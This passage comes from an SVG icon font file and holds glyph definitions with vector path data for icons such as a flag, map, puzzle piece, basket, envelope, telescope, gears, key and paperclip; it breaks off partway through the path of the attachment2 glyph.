<glyph unicode="&#xe024;" glyph-name="flag2" horiz-adv-x="896" d="M432 928h-352c-8.832 0-16-7.168-16-16v-480c0-8.832 7.168-16 16-16h352.064c8.032 0 47.936-2.368 47.936-48 0-8.832 7.168-16 16-16s16 7.168 16 16v480.512c-0.864 27.488-18.688 79.488-80 79.488zM480 433.408c-16.032 10.784-34.816 14.592-48 14.592h-336v448h336c44.672 0 47.808-43.616 48-48v-414.592zM842.528 288h-442.944c0.192-0.032-22.496-0.288-36.48 13.408-8.032 7.904-12.128 19.52-12.128 34.592 0 8.832-7.168 16-16 16s-16-7.168-16-16c0-24.128 7.392-43.52 22.016-57.696 21.984-21.28 52.736-22.304 58.208-22.304 0.48 0 443.328 0 443.328 0 12.448 0 23.008 5.024 29.792 14.176 8.992 12.128 8.8 27.616 5.92 37.184-18.016 59.296-113.312 188.256-140.128 223.872 25.824 39.712 122.080 190.080 140.128 249.376 2.912 9.568 3.104 25.024-5.92 37.184-6.784 9.184-17.344 14.208-29.792 14.208h-281.184c-8.832 0-16-7.168-16-16s7.168-16 16-16h281.184c3.168 0 3.808-0.896 4.064-1.248 1.504-1.984 1.76-6.304 0.992-8.8-19.072-62.752-141.184-248.704-142.432-250.592-3.744-5.696-3.456-13.12 0.672-18.528 1.216-1.6 122.848-160.576 141.76-222.752 0.736-2.528 0.512-6.816-0.992-8.832-0.256-0.352-0.896-1.248-4.064-1.248zM32-48v992c0 8.832-7.168 16-16 16s-16-7.168-16-16v-992c0-8.832 7.168-16 16-16s16 7.168 16 16z" />
<glyph unicode="&#xe025;" glyph-name="map3" horiz-adv-x="1312" d="M295.648-61.664c0.288-0.192 0.672-0.096 0.96-0.288 2.336-1.184 4.768-2.048 7.392-2.048 1.408 0 2.816 0.192 4.224 0.576l347.776 94.912 347.776-94.912c1.408-0.384 2.816-0.576 4.224-0.576 2.624 0 5.056 0.864 7.36 2.080 0.32 0.16 0.672 0.096 0.96 0.288l288 176c6.112 3.744 8.992 11.136 7.040 18.016l-159.488 560c-1.312 4.704-4.736 8.544-9.28 10.432-4.544 1.824-9.632 1.536-13.952-0.832l-158.784-89.088c-7.68-4.32-10.432-14.080-6.112-21.792 4.32-7.744 14.048-10.464 21.824-6.112l141.088 79.2 150.624-528.832-256.48-156.768-60.928 487.392c-1.088 8.8-9.376 14.912-17.888 13.888-8.736-1.088-14.976-9.088-13.888-17.856l61.024-488.288-317.12 86.56v87.36c0 8.832-7.168 16-16 16s-16-7.168-16-16v-87.36l-317.152-86.56 61.024 488.288c1.088 8.768-5.12 16.768-13.888 17.856-8.704 1.024-16.768-5.088-17.888-13.888l-60.896-487.392-256.48 156.736 150.624 528.8 141.088-79.2c7.744-4.288 17.472-1.568 21.824 6.112 4.32 7.712 1.568 17.44-6.112 21.792l-158.816 89.12c-4.256 2.4-9.344 2.72-13.92 0.832-4.544-1.888-7.968-5.696-9.28-10.432l-159.488-560c-1.984-6.912 0.896-14.272 7.040-18.016l287.968-176zM645.152 212.224c3.072-2.816 6.944-4.224 10.848-4.224 3.84 0 7.68 1.376 10.752 4.128 10.656 9.696 261.248 239.648 261.248 475.872 0 152.544-119.456 272-272 272s-272-119.456-272-272c0-232.128 250.496-465.92 261.152-475.776zM656 928c136.8 0 240-103.168 240-240 0-195.104-191.776-394.784-239.904-441.824-48.032 47.584-240.096 249.888-240.096 441.824 0 136.832 103.2 240 240 240zM800 688c0 79.392-64.608 144-144 144s-144-64.608-144-144 64.608-144 144-144 144 64.608 144 144zM656 576c-61.76 0-112 50.24-112 112s50.24 112 112 112 112-50.24 112-112-50.24-112-112-112z" />
<glyph unicode="&#xe026;" glyph-name="puzzle" horiz-adv-x="1120" d="M641.344 834.976c0 62.24-49.888 125.024-161.344 125.024-98.144 0-164.128-50.24-164.128-125.024 0-43.648 17.664-63.552 29.344-76.736 6.176-6.944 8.672-10.080 8.672-13.216 0-5.184 0-8.32-17.856-9.024h-195.136c-75.040 0-140.896-59.808-140.896-128v-119.424c1.216-30.208 18.272-48.992 44.544-48.992 14.944 0 26.016 8.544 36.768 16.832 14.4 11.040 30.688 23.584 62.688 23.584 54.272 0 112-44.864 112-128 0-84.128-58.496-142.784-111.008-142.784-31.68 0-48.256 13.728-62.912 25.824-10.976 9.088-22.304 18.496-37.568 18.496-26.24 0-43.328-18.784-44.544-49.632v-131.264c0.032-71.52 67.2-136.64 140.928-136.64h196.128c29.696 1.216 48.864 18.72 48.864 44.672 0 15.584-8.864 25.6-16.704 34.432-10.496 11.808-21.312 24-21.312 55.488 0 56.512 51.328 93.024 130.72 93.024 79.424 0 130.752-36.512 130.752-93.024 0-31.488-10.848-43.68-21.312-55.488-7.84-8.832-16.736-18.848-16.736-34.432 0-26.304 18.72-43.392 49.536-44.64l126.112-0.032c68.864 0 116.992 53.664 116.992 130.496v148.8c0.832 3.904 10.688 18.816 25.728 18.816 3.072 0 6.176-2.528 13.088-8.672 13.12-11.744 32.992-29.504 76.576-29.504 69.888 0.032 140.672 53.6 140.672 156.064 0 110.528-64.288 160-128 160-43.008 0-67.84-19.648-84.288-32.64-7.296-5.76-14.144-11.2-18.048-11.2-15.072 0-24.928 14.976-25.664 18.272-0.032 0.256-0.032 0.512-0.064 0.768v114.656c0 77.728-49.216 134.144-116.992 134.144h-125.472c-0.416 0.032-0.832 0.064-1.28 0.096-16.896 0.64-16.896 3.744-16.896 8.928 0 3.136 2.496 6.24 8.672 13.216 11.68 13.152 29.376 33.088 29.376 76.736zM588.032 779.456c-7.84-8.832-16.736-18.88-16.736-34.464 0-17.6 8.032-38.784 47.072-40.864 0.736-0.096 1.472-0.128 2.24-0.128h126.336c55.808 0 85.056-51.392 85.056-102.144v-116.256c0-1.152-0.224-2.272 0-3.36 2.944-19.552 26.944-46.048 57.664-46.048 15.040 0 26.112 8.768 37.92 18.080 15.232 12.064 32.544 25.728 64.416 25.728 58.304 0 96-50.24 96-128 0-85.248-56.352-124.032-108.672-124.032-31.328 0-43.488 10.848-55.264 21.344-8.832 7.872-18.848 16.8-34.4 16.8-30.72 0-54.752-26.528-57.664-46.080-0.224-1.088 0-2.208 0-3.36v-150.208c0-48.992-26.336-98.464-85.056-98.464h-125.472c-18.176 0.736-18.176 9.12-18.176 12.672 0 3.104 2.496 6.24 8.672 13.216 11.68 13.184 29.376 33.088 29.376 76.736 0 62.24-50.304 125.024-162.752 125.024-97.312 0-162.72-50.24-162.72-125.024 0-43.648 17.664-63.552 29.376-76.736 6.144-6.944 8.672-10.080 8.672-13.216 0-3.584 0-11.968-17.536-12.672h-195.488c-54.944 0-108.896 51.84-108.896 104.64v130.624c0.704 18.272 8.992 18.272 12.544 18.272 3.712 0 10.24-5.408 17.184-11.136 15.936-13.216 40.096-33.184 83.296-33.184 69.024 0 142.976 70.24 142.976 174.784 0 103.936-74.176 160-144 160-42.88 0-66.528-18.176-82.176-30.24-7.104-5.472-13.248-10.176-17.28-10.176-3.52 0-11.808 0-12.544 17.632v118.784c0 56.576 57.408 96 108.896 96h195.68c0.512 0 0.992 0.032 1.504 0.064v0c39.52 1.472 47.808 23.104 47.808 40.96 0 15.584-8.864 25.6-16.704 34.432-10.496 11.808-21.312 24-21.312 55.52 0 55.648 53.088 93.024 132.128 93.024 78.56 0 129.344-36.512 129.344-93.024 0-31.488-10.848-43.712-21.312-55.52z" />
<glyph unicode="&#xe027;" glyph-name="basket" horiz-adv-x="1344" d="M1264 512h-1184c-4.928 0-9.6-2.272-12.64-6.144s-4.096-8.928-2.912-13.728l128.192-512.544c3.072-10.784 12.512-43.584 47.36-43.584h864c34.976 0 44.32 32.832 47.52 44.128l128 512c1.184 4.768 0.128 9.856-2.912 13.728-3.008 3.872-7.68 6.144-12.608 6.144zM1120.64-11.616c-5.824-20.384-11.84-20.384-16.64-20.384h-864c-4.768 0-10.752 0-16.48 19.872l-123.008 492.128h1143.008l-122.88-491.616zM592 64c8.832 0 16 7.168 16 16v288c0 8.832-7.168 16-16 16s-16-7.168-16-16v-288c0-8.832 7.168-16 16-16zM367.968 64c0.608 0 1.184 0.032 1.824 0.096 8.768 0.992 15.104 8.896 14.112 17.664l-32 288c-0.96 8.8-8.64 15.008-17.696 14.144-8.768-0.992-15.104-8.896-14.112-17.664l32-288c0.896-8.192 7.84-14.24 15.872-14.24zM784 64c8.832 0 16 7.168 16 16v288c0 8.832-7.168 16-16 16s-16-7.168-16-16v-288c0-8.832 7.168-16 16-16zM974.208 64.096c0.64-0.064 1.216-0.096 1.824-0.096 8.032 0 14.976 6.048 15.872 14.24l32 288c0.96 8.768-5.344 16.672-14.112 17.664-9.184 0.896-16.704-5.344-17.696-14.144l-32-288c-0.96-8.768 5.344-16.672 14.112-17.664zM1104 576c3.712 0 7.424 1.28 10.464 3.904 6.688 5.792 7.392 15.872 1.632 22.56l-304 352c-5.792 6.72-15.872 7.392-22.56 1.664-6.688-5.792-7.392-15.872-1.632-22.56l304-352c3.168-3.68 7.616-5.568 12.096-5.568zM570.112 956.384c-6.816 5.536-16.896 4.608-22.496-2.272l-288-352c-5.6-6.816-4.608-16.896 2.24-22.528 2.976-2.4 6.592-3.584 10.144-3.584 4.64 0 9.216 1.984 12.384 5.888l288 352c5.6 6.816 4.576 16.896-2.272 22.496zM1328 640h-128c-8.832 0-16-7.168-16-16s7.168-16 16-16h128c8.832 0 16 7.168 16 16s-7.168 16-16 16zM432 608h512c8.832 0 16 7.168 16 16s-7.168 16-16 16h-512c-8.832 0-16-7.168-16-16s7.168-16 16-16zM16 608h160c8.832 0 16 7.168 16 16s-7.168 16-16 16h-160c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe028;" glyph-name="envelope" horiz-adv-x="1216" d="M641.92 946.784c-18.56 17.056-49.248 17.056-67.808 0l-566.016-341.472c-4.8-2.912-7.744-8.096-7.744-13.696v-605.504c0-27.616 22.592-50.112 50.368-50.112h1114.56c27.776 0 50.368 22.496 50.368 50.112v605.504c0 5.6-2.944 10.784-7.744 13.696l-565.984 341.472zM592.128 920.32c1.12 0.672 2.112 1.472 3.040 2.368 3.456 3.424 8 5.312 12.832 5.312s9.376-1.888 12.8-5.312c0.928-0.896 1.952-1.696 3.040-2.368l551.264-332.608-399.296-237.952c-7.584-4.544-10.080-14.336-5.568-21.952 3.008-5.024 8.32-7.808 13.76-7.808 2.784 0 5.6 0.704 8.16 2.24l391.84 233.28v-568.224l-541.92 360.512c-17.216 13.728-51.008 13.728-67.072 0.8l-543.008-361.152v568.064l391.808-233.28c2.56-1.536 5.408-2.24 8.192-2.24 5.44 0 10.752 2.784 13.76 7.808 4.512 7.584 2.016 17.408-5.568 21.952l-399.328 237.952 551.264 332.608zM1154.88-32h-1094.016l532.992 354.752c5.536 4.416 22.784 4.384 29.408-0.8l531.616-353.952zM208 544h800c8.832 0 16 7.168 16 16s-7.168 16-16 16h-800c-8.832 0-16-7.168-16-16s7.168-16 16-16z" />
<glyph unicode="&#xe029;" glyph-name="streetsign" horiz-adv-x="928" d="M480-48v304c0 8.832-4.256 32-13.088 32s-18.912-7.168-18.912-16v-320c0-8.832 10.048-16 18.912-16s13.088 7.168 13.088 16zM482.912 910.016v33.984c0 8.832-7.168 16-16 16s-16-7.168-16-16v-33.984c0-8.832 7.168-16 16-16s16 7.136 16 16zM124.48 848.928l-114.144-89.536c-6.56-6.048-10.336-14.592-10.336-23.392s3.776-17.344 11.328-24.256l112.16-87.84c9.824-9.056 27.328-15.904 40.736-15.904h442.496c18.336 0 33.28 14.816 33.28 33.056v189.888c0 18.24-14.944 33.056-33.28 33.056h-442.496c-13.408 0-30.912-6.848-39.744-15.072zM608 641.056c0-0.48-0.576-1.056-1.28-1.056h-442.496c-5.44 0-15.072 3.744-20 8.256l-113.152 86.816 114.112 89.536c4 3.648 13.6 7.392 19.040 7.392l443.776-1.056v-189.888zM804.512 560.096c-9.824 9.056-27.328 15.904-40.736 15.904h-442.496c-18.336 0-33.28-14.816-33.28-33.056v-189.92c0-18.208 14.944-33.024 33.28-33.024h442.496c13.408 0 30.912 6.848 39.776 15.072l114.112 89.536c6.56 6.048 10.336 14.592 10.336 23.392s-3.776 17.344-11.328 24.256l-112.16 87.84zM320 544h443.776c5.44 0 15.072-3.744 20-8.256l113.152-86.816-114.112-89.536c-4-3.648-13.6-7.392-19.040-7.392h-443.776v192z" />
<glyph unicode="&#xe02a;" glyph-name="telescope" horiz-adv-x="1120" d="M878.848 885.952c-1.696 4.224-5.088 7.52-9.344 9.088-4.256 1.536-8.992 1.248-12.992-0.864l-380.992-201.024c-7.168-3.776-10.368-12.32-7.456-19.872l7.84-20.512-219.936-120.608c-7.2-3.936-10.24-12.64-7.104-20.16l7.296-17.568-233.568-111.616c-7.68-3.68-11.136-12.704-7.872-20.576l47.936-115.52c2.56-6.144 8.48-9.888 14.784-9.888 1.792 0 3.584 0.288 5.344 0.928l244 86.432 7.296-17.568c2.528-6.112 8.448-9.888 14.784-9.888 1.472 0 2.944 0.192 4.448 0.64l232.832 67.104 6.976-18.208c2.368-6.304 8.416-10.272 14.88-10.272 1.568 0 3.136 0.224 4.704 0.704l416 128c4.288 1.312 7.808 4.352 9.728 8.384s2.080 8.704 0.416 12.832l-160 400.032zM86.4 272.992l-36.288 87.488 218.336 104.352 46.048-111.040-228.096-80.8zM358.112 332.064l-7.616 18.368c0 0 0 0 0 0l-58.976 142.24c0 0 0 0 0 0l-7.616 18.336 202.752 111.2 75.968-196.288 12-31.392-216.512-62.464zM617.6 371.68l-6.496 16.992c-0.096 0.352-0.032 0.768-0.192 1.12l-19.776 51.104-88.128 230.592 352.736 186.080 146.944-367.36-385.088-118.528zM926.848 949.952c-3.296 8.224-12.64 12.192-20.8 8.928-8.192-3.296-12.192-12.608-8.928-20.8l192-480c2.528-6.272 8.544-10.080 14.88-10.080 1.984 0 4 0.352 5.952 1.152 8.192 3.296 12.192 12.608 8.928 20.8l-192.032 480zM576 288h-96c-36.48 0-64-27.52-64-64v-42.080l-188.128-219.488c-5.76-6.688-4.992-16.8 1.728-22.56 3.008-2.592 6.72-3.872 10.4-3.872 4.512 0 8.992 1.888 12.128 5.6l187.232 218.4h72.64v-208c0-8.832 7.168-16 16-16s16 7.168 16 16v208h72.64l187.2-218.4c3.168-3.712 7.648-5.6 12.16-5.6 3.68 0 7.392 1.28 10.4 3.872 6.72 5.76 7.488 15.84 1.728 22.56l-188.128 219.488v39.68c0 37.216-28.096 66.4-64 66.4zM608 192h-160v32c0 18.848 13.152 32 32 32h96c18.24 0 32-14.784 32-34.4v-29.6z" />
<glyph unicode="&#xe02b;" glyph-name="gears" horiz-adv-x="1344" d="M118.144 264.96c5.632-1.344 13.28-8.288 15.488-14.624l11.2-27.008c2.528-5.184 2.048-15.456-0.96-20.384l-44.704-73.088c-9.568-15.68-7.584-37.888 5.28-52.288l37.856-37.824c13.184-11.712 36.448-13.824 51.616-4.64l73.088 44.704c4.576 2.816 14.4 3.808 21.28 0.576l26.976-11.136c5.44-1.888 12.384-9.504 13.728-15.136l20.064-83.328c4.256-17.664 21.12-32.192 39.232-33.856 0 0 11.104-1.024 27.744-1.024s27.744 1.024 27.776 1.024c18.080 1.632 34.944 16.192 39.2 33.856l20.096 83.328c1.344 5.6 8.256 13.248 14.592 15.456l27.008 11.2c4.768 2.336 15.808 1.856 20.384-0.96l73.088-44.704c6.432-3.936 14.112-6.016 22.272-6.016 11.040 0 21.728 3.872 30.016 11.264l37.824 37.856c12.224 13.728 14.208 35.936 4.64 51.616l-44.704 73.088c-3.008 4.928-3.488 15.2-0.576 21.28l11.136 26.976c1.888 5.44 9.504 12.384 15.136 13.728l83.328 20.064c17.664 4.256 32.192 21.12 33.856 39.232 0 0 1.024 11.104 1.024 27.744s-1.024 27.744-1.024 27.776c-1.632 18.080-16.192 34.944-33.856 39.232l-83.296 20.032c-5.632 1.344-13.28 8.288-15.488 14.624l-11.2 27.008c-2.528 5.184-2.048 15.456 0.96 20.384l44.704 73.088c9.568 15.68 7.584 37.888-5.28 52.288l-37.856 37.824c-13.216 11.744-36.512 13.856-51.616 4.64l-73.088-44.704c-4.576-2.784-14.432-3.84-21.28-0.576l-26.976 11.136c-5.44 1.888-12.352 9.504-13.696 15.136l-20.096 83.328c-4.256 17.664-21.12 32.192-39.232 33.856-0.064-0.032-11.168 0.992-27.808 0.992s-27.744-1.024-27.776-1.024c-18.080-1.632-34.944-16.192-39.232-33.856l-20.032-83.264c-1.344-5.632-8.288-13.28-14.624-15.488l-27.008-11.2c-4.8-2.336-15.808-1.824-20.384 0.96l-73.056 44.704c-15.136 9.216-37.92 7.616-52.288-5.248l-37.824-37.856c-12.224-13.728-14.208-35.936-4.64-51.616l44.704-73.088c3.008-4.928 3.488-15.2 0.576-21.28l-11.136-26.976c-1.888-5.44-9.504-12.384-15.136-13.728l-83.328-20.064c-17.664-4.256-32.192-21.12-33.856-39.232 0.064 0-0.96-11.104-0.96-27.744s1.024-27.744 1.024-27.776c1.632-18.080 16.192-34.944 33.856-39.232l83.264-20.032zM32 352c0 14.656 0.864 24.544 0.896 24.864 0.384 4.32 5.28 9.984 9.472 11.008l83.328 20.064c16.16 3.904 32.448 18.688 37.504 33.504l10.368 25.184c7.296 14.944 6.272 36.896-2.4 51.104l-44.704 73.056c-2.144 3.552-1.536 10.592 0.576 12.992l36.512 36.544c2.912 2.592 10.336 3.232 13.664 1.216l73.088-44.704c13.856-8.48 37.6-9.056 50.176-2.816l25.216 10.432c15.712 5.408 30.496 21.696 34.4 37.888l20.032 83.296c1.024 4.224 6.688 9.12 11.008 9.504 0.32 0 10.208 0.864 24.864 0.864s24.544-0.864 24.864-0.896c4.32-0.384 9.984-5.28 11.008-9.472l20.064-83.296c3.904-16.16 18.656-32.48 33.504-37.536l25.184-10.368c14.624-7.168 37.28-6.048 51.104 2.4l73.056 44.704c3.328 2.016 11.2 0.96 12.992-0.576l36.544-36.512c2.752-3.104 3.36-10.112 1.216-13.664l-44.704-73.088c-8.672-14.176-9.696-36.16-2.816-50.176l10.432-25.216c5.408-15.712 21.696-30.496 37.888-34.4l83.296-20.032c4.224-1.024 9.12-6.688 9.504-11.008 0-0.32 0.864-10.208 0.864-24.864s-0.864-24.544-0.896-24.864c-0.384-4.32-5.28-9.984-9.472-11.008l-83.328-20.064c-16.16-3.904-32.448-18.688-37.504-33.504l-10.368-25.184c-7.296-14.944-6.272-36.896 2.4-51.104l44.704-73.056c2.144-3.552 1.536-10.592-0.576-12.992l-36.512-36.544c-1.728-1.536-4.864-2.528-8.032-2.528-2.208 0-4.256 0.48-5.6 1.312l-73.088 44.704c-13.824 8.448-37.568 9.056-50.176 2.816l-25.216-10.432c-15.712-5.408-30.496-21.728-34.368-37.888l-20.064-83.296c-1.024-4.224-6.688-9.12-11.008-9.504-0.352 0-10.24-0.864-24.896-0.864s-24.544 0.864-24.864 0.896c-4.32 0.384-9.984 5.28-11.008 9.472l-20.064 83.328c-3.904 16.16-18.688 32.448-33.504 37.504l-25.184 10.368c-6.528 3.2-14.432 4.864-22.88 4.864-10.528 0-20.544-2.592-28.224-7.296l-73.056-44.704c-3.328-2.016-11.232-0.928-12.992 0.576l-36.544 36.544c-2.752 3.104-3.36 10.112-1.216 13.664l44.704 73.088c8.672 14.176 9.696 36.16 2.816 50.176l-10.432 25.216c-5.408 15.712-21.696 30.496-37.888 34.4l-83.296 20.032c-4.224 1.024-9.12 6.688-9.504 11.008 0 0.32-0.864 10.208-0.864 24.864zM416 176c97.056 0 176 78.944 176 176s-78.944 176-176 176-176-78.944-176-176 78.944-176 176-176zM416 496c79.392 0 144-64.608 144-144s-64.608-144-144-144-144 64.608-144 144 64.608 144 144 144zM879.264 789.952c-1.28-1.952-5.92-4.416-8.288-4.416l-59.552 0.576c-14.464 0-28.96-10.272-33.696-23.872 0 0-2.624-7.456-5.504-18.88s-4.096-19.232-4.096-19.232c-2.24-14.432 5.792-30.4 18.688-37.152l52.512-27.52c2.016-1.056 4.992-5.504 5.312-8.736l2.976-20.32c0.48-2.24-1.056-7.36-2.688-8.96l-42.304-41.472c-10.592-10.368-13.376-28.096-6.080-42.016l19.168-32c8.096-11.904 25.632-17.984 39.392-13.696l58.368 17.856c3.168 0 6.336-1.216 8.128-2.656l16.48-12.16c1.92-1.28 4.448-5.984 4.416-8.288l-0.576-59.264c-0.128-14.592 10.112-29.216 23.872-34.016 0 0 7.456-2.624 18.88-5.504s19.232-4.096 19.232-4.096c0.832-0.128 4.16-0.384 4.992-0.384 13.056 0 26.304 7.84 32.16 19.072l27.52 52.512c1.056 2.016 5.504 4.992 8.736 5.312l21.216 3.072c3.2 0 6.976-1.664 8.032-2.752l41.472-42.304c10.080-10.304 27.072-13.984 42.016-6.080l31.968 19.168c12.224 8.32 18.144 25.28 13.728 39.392l-17.664 56.544c-0.672 2.176 0.384 7.424 2.496 9.952l12.16 16.48c1.28 1.952 5.92 4.416 8.288 4.416l59.552-0.576c14.464 0 28.96 10.272 33.696 23.872 0 0 2.624 7.456 5.504 18.88s4.096 19.232 4.096 19.232c2.24 14.432-5.792 30.4-18.688 37.152l-52.512 27.52c-2.016 1.056-4.992 5.504-5.312 8.736l-2.944 20.256c-0.48 2.24 1.056 7.36 2.688 8.96l42.304 41.472c10.592 10.368 13.376 28.096 6.080 42.016l-19.168 32c-8.096 11.872-25.6 18.016-39.392 13.728l-58.4-17.856c-3.168 0-6.336 1.216-8.128 2.656l-16.48 12.16c-1.92 1.28-4.448 5.984-4.416 8.288l0.576 59.264c0.128 14.592-10.112 29.216-23.872 34.016 0 0-7.456 2.624-18.88 5.504s-19.232 4.096-19.232 4.096c-0.832 0.096-4.16 0.352-4.992 0.352-13.056 0-26.304-7.84-32.16-19.072l-27.52-52.512c-1.056-2.016-5.504-4.992-8.736-5.312l-21.216-3.040c-3.2 0-6.976 1.664-8.032 2.752l-41.472 42.304c-10.048 10.272-27.008 13.984-42.016 6.080l-32-19.136c-12.224-8.32-18.144-25.28-13.728-39.392l17.664-56.544c0.672-2.176-0.384-7.424-2.496-9.952l-12.128-16.48zM905.504 771.648l10.976 14.912c8.576 10.144 11.904 26.688 7.936 39.328l-17.632 56.512c-0.16 0.896 0.544 2.912 0.384 2.944l30.336 18.176 3.616-0.544 41.504-42.304c7.36-7.488 19.488-12.352 30.88-12.352 2.624 0 5.152 0.256 6.528 0.608l18.4 2.72c13.184 1.152 27.232 10.496 33.376 22.208l27.488 52.48c0.512 0.8 2.528 1.952 3.84 1.952 0.352-0.032 6.88-1.12 16.416-3.488 9.504-2.4 15.776-4.544 16.064-4.672 0.992-0.416 2.432-2.496 2.496-3.52l-0.576-59.264c-0.128-13.248 7.84-28.128 18.144-34.848l14.88-10.976c9.888-8.352 26.848-11.872 39.328-7.936l56.768 17.664c1.344 0 2.848-0.832 2.656-0.416l18.176-30.336c0.352-0.832 0-2.944-0.544-3.616l-42.304-41.504c-9.44-9.312-14.336-25.44-11.744-37.408l2.688-18.4c1.152-13.184 10.496-27.232 22.24-33.376l52.48-27.488c0.896-0.576 2.016-2.816 1.952-3.84-0.032-0.352-1.12-6.88-3.488-16.416-2.4-9.504-4.544-15.776-4.672-16.064-0.416-0.992-2.496-2.432-3.52-2.496l-59.584 0.576c-13.152 0-27.872-7.968-34.528-18.144l-10.944-14.88c-8.576-10.144-11.904-26.688-7.936-39.328l17.632-56.512c0.16-0.864-0.544-2.912-0.384-2.944l-30.336-18.176-3.616 0.544-41.504 42.304c-7.36 7.488-19.488 12.352-30.88 12.352-2.624 0-5.152-0.256-6.528-0.608l-18.4-2.72c-13.184-1.152-27.232-10.496-33.376-22.208l-27.488-52.48c-0.512-0.8-2.528-1.952-3.84-1.952v0c-0.352 0.032-6.88 1.12-16.416 3.488-9.504 2.4-15.776 4.544-16.064 4.672-0.992 0.416-2.432 2.496-2.496 3.52l0.576 59.264c0.128 13.248-7.84 28.128-18.144 34.848l-14.88 10.976c-7.104 6.016-17.568 9.6-28 9.6-4.032 0-7.872-0.576-11.36-1.664l-56.768-17.664c-1.376 0-2.88 0.736-2.656 0.416l-18.176 30.336c-0.352 0.832 0 2.944 0.544 3.616l42.304 41.504c9.44 9.312 14.336 25.44 11.744 37.408l-2.688 18.368c-1.152 13.184-10.496 27.232-22.24 33.376l-52.48 27.488c-0.896 0.576-2.016 2.816-1.952 3.84 0.032 0.352 1.12 6.88 3.488 16.416 2.4 9.504 4.544 15.776 4.672 16.064 0.416 0.992 2.496 2.432 3.52 2.496l59.584-0.576c13.152 0 27.872 7.968 34.528 18.144zM1056 576c52.928 0 96 43.072 96 96s-43.072 96-96 96-96-43.072-96-96 43.072-96 96-96zM1056 736c35.296 0 64-28.704 64-64s-28.704-64-64-64-64 28.704-64 64 28.704 64 64 64z" />
<glyph unicode="&#xe02c;" glyph-name="key3" d="M469.856 489.664c3.744 0 7.52 1.312 10.56 3.968l362.144 317.504-21.12 24.064-362.144-317.472c-6.656-5.824-7.328-15.936-1.472-22.592 3.168-3.616 7.584-5.472 12.032-5.472zM326.016-64c196.544 0 313.984 154.56 313.984 304 0 43.072-10.304 90.528-25.536 121.344l144.704 72.352c5.408 2.72 8.832 8.256 8.832 14.304v128h96c0.352 0 3.264 0.192 3.616 0.192 21.312 1.44 27.68 8.224 28.384 31.808v128h96c4.128 0 6.976-0.448 8.896-0.736 3.872-0.608 11.104-1.728 17.376 3.904 6.464 5.76 6.176 13.056 5.92 19.488-0.064 2.304-0.192 5.344-0.192 9.344v144.992c0 25.92-21.088 47.008-47.008 47.008h-124c-11.328 0-22.336-4.128-31.008-11.648l-421.984-369.92c-20.768 4.16-52.16 9.568-74.016 9.568-179.744 0-325.984-146.24-325.984-325.984s146.24-326.016 326.016-326.016zM326.016 556c16.032 0 43.488-3.84 75.328-10.496 4.96-1.088 10.048 0.32 13.824 3.616l427.872 375.104c2.784 2.432 6.336 3.776 9.952 3.776h124c8.288 0 15.008-6.72 15.008-15.008v-144.992h-112c-8.832 0-16-7.168-16-16v-144h-112c-8.832 0-16-7.168-16-16v-134.112l-151.168-75.584c-4.192-2.080-7.264-5.952-8.384-10.496s-0.192-9.376 2.56-13.184c14.080-19.424 28.992-67.648 28.992-118.624 0-133.696-105.472-272-281.984-272-162.112 0-294.016 131.904-294.016 294.016s131.904 293.984 294.016 293.984zM272 96c61.76 0 112 50.24 112 112s-50.24 112-112 112-112-50.24-112-112 50.24-112 112-112zM272 288c44.096 0 80-35.904 80-80s-35.904-80-80-80-80 35.904-80 80 35.904 80 80 80z" />
<glyph unicode="&#xe02d;" glyph-name="paperclip" horiz-adv-x="1088" d="M178.784-59.744c64.48 0 133.856 32.832 182.624 81.632l540.256 549.408c27.712 27.712 43.136 64.448 43.392 103.392 0.288 39.040-14.688 75.648-42.112 103.104-56.576 56.544-149.152 56.032-206.784-1.536l-414.112-432.96c-6.496-6.816-6.272-17.664 0.576-24.192 6.816-6.528 17.6-6.272 24.192 0.544l413.824 432.704c43.936 43.968 114.912 44.512 158.112 1.28 20.896-20.896 32.32-48.832 32.096-78.656-0.192-29.92-12.064-58.112-33.472-79.552l-540.256-549.44c-56.832-56.8-173.632-108.32-243.68-38.208-33.184 33.184-49.824 73.888-48.096 117.728 1.696 43.52 22.176 87.040 57.824 122.656l617.472 626.688c32.832 32.832 84.128 51.84 140.672 52.032 0.352 0 0.672 0 1.024 0 56.064 0 106.656-18.464 138.944-50.752 32.512-32.48 51.008-83.488 50.784-139.968-0.224-56.544-19.232-107.808-52.288-140.864l-476.64-495.52c-6.56-6.816-6.336-17.632 0.48-24.192 6.784-6.528 17.632-6.336 24.16 0.48l476.416 495.296c39.2 39.168 61.824 99.2 62.048 164.672 0.288 65.504-21.888 125.408-60.768 164.288-38.656 38.656-98.048 60.8-163.136 60.8-0.384 0-0.768 0-1.152 0-65.504-0.256-125.536-22.88-164.8-62.144l-617.504-626.72c-86.432-86.432-90.464-207.84-9.632-288.672 30.304-30.272 68.928-43.328 109.536-43.328z" />
<glyph unicode="&#xe02e;" glyph-name="attachment2" d="M607.552 432.928c5.248-0.576 10.464-0.832 15.68-0.832 38.912 0 76.224 15.392 104.256 43.424l236.96 236.96c27.712 27.712 43.168 64.448 43.392 103.392 0.288 39.040-14.688 75.648-42.112 103.104-27.2 27.2-63.36 42.144-102.016 42.144-0.352 0-0.672 0-1.056 0-38.944-0.256-75.648-15.68-103.36-43.392l-236.96-236.96c-35.040-35.040-50.208-84.768-40.608-133.024 1.856-9.28 11.072-15.328 20.128-13.408 9.28 1.856 15.296 10.848 13.44 20.096-7.392 37.024 4.288 75.232 31.232 102.144l236.96 236.96c21.312 21.344 49.536 33.184 79.424 33.376 31.2 0 57.76-11.2 78.656-32.096s32.32-48.864 32.128-78.656c-0.224-29.92-12.064-58.112-33.408-79.424l-236.96-236.96c-24.448-24.416-58.016-36.256-92.128-32.768-9.12 1.056-17.824-5.792-18.816-15.2-1.024-9.472 5.792-17.888 15.168-18.88zM484.48 215.264c36.736 36.736 51.456 88.608 39.328 138.688-2.208 9.184-11.232 14.912-20.672 12.608-9.184-2.208-14.816-11.456-12.608-20.64 9.312-38.432-2.016-78.208-30.272-106.496l-236.96-236.96c-21.312-21.344-49.536-33.184-79.424-33.376-30.688-0.16-57.76 11.168-78.656 32.096-20.896 20.896-32.32 48.832-32.096 78.656 0.192 29.92 12.064 58.112 33.376 79.456l236.96 236.96c24.672 24.672 58.304 36.608 92.992 32.672 9.216-0.704 17.888 5.664 18.944 15.072 1.056 9.376-5.664 17.856-15.072 18.944-44.928 5.056-88.96-10.368-121.056-42.464l-236.96-236.96c-27.712-27.712-43.136-64.448-43.392-103.392-0.288-39.040 14.688-75.648 42.112-103.104 27.2-27.2 63.36-42.144 102.016-42.144 0.352 0 0.672 0 1.056 0 38.944 0.256 75.648 15.68 